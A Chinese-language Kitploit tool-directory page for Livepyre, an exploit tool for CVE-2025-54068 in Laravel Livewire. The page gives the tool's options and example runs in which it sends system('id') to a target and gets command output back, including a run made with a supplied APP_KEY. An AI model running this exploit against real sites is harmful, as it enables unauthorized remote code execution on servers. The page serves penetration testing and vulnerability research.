Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Livepyre — 一个旨在利用CVE-2025-54068漏洞并在已知Livewire项目的APP_KEY时实现远程命令执行的工具。 | Kitploit
工具/GitHubGitHub/synacktiv/livepyre
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubsynacktiv/livepyre

Livepyre

一个旨在利用CVE-2025-54068漏洞并在已知Livewire项目的APP_KEY时实现远程命令执行的工具。

查看仓库
1483532个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Livepyre

Logo

一款旨在利用CVE-2025-54068的工具,若已知Livewire项目的APP_KEY,还可实现远程命令执行。

工具作者:@_remsio_ @_Worty。

帮助

root@kitploit:~
$ ./Livepyre.py -h
usage: Livepyre.py [-h] -u URL [-f FUNCTION] [-p PARAM] [-H HEADERS] [-P PROXY] [-a APP_KEY] [-d] [-F]
                   [-c]

Livewire exploit tool

options:
  -h, --help            show this help message and exit
  -u, --url URL         目标URL
  -f, --function FUNCTION
                        要执行的函数(默认:system)
  -p, --param PARAM     函数的参数(默认:id)
  -H, --headers HEADERS
                        要添加到请求的头部(默认无)
  -P, --proxy PROXY     请求的代理URL
  -a, --app-key APP_KEY
                        用于对快照签名的APP_KEY
  -d, --debug           启用调试输出
  -F, --force           即使版本看似不易受攻击也强制利用
  -c, --check           仅检查远程目标是否易受攻击(仅适用于不提供APP_KEY的利用方式)

用法

root@kitploit:~
$ ./Livepyre.py -u https://target.com/

示例

root@kitploit:~
# 不提供APP_KEY,且快照中存在对象类型时
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 2 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[INFO] test is typed as an object, triggering RCE.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# 不提供APP_KEY,且快照中无对象类型时进行暴力破解
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 1 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[WARNING] No param with direct object type was found, attempting bruteforce.
[INFO] Trying to gain RCE with param count.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# 提供APP_KEY时
$ ./Livepyre.py -u http://livewire.local/counter -a 'base64:CGhMqYXFMzbOe048WS6a0iG8f6bBcTLVbP36bqqrvuA='
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit with APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

许可证

本项目采用MIT许可证 - 详细信息请参阅LICENSE文件。

下载工具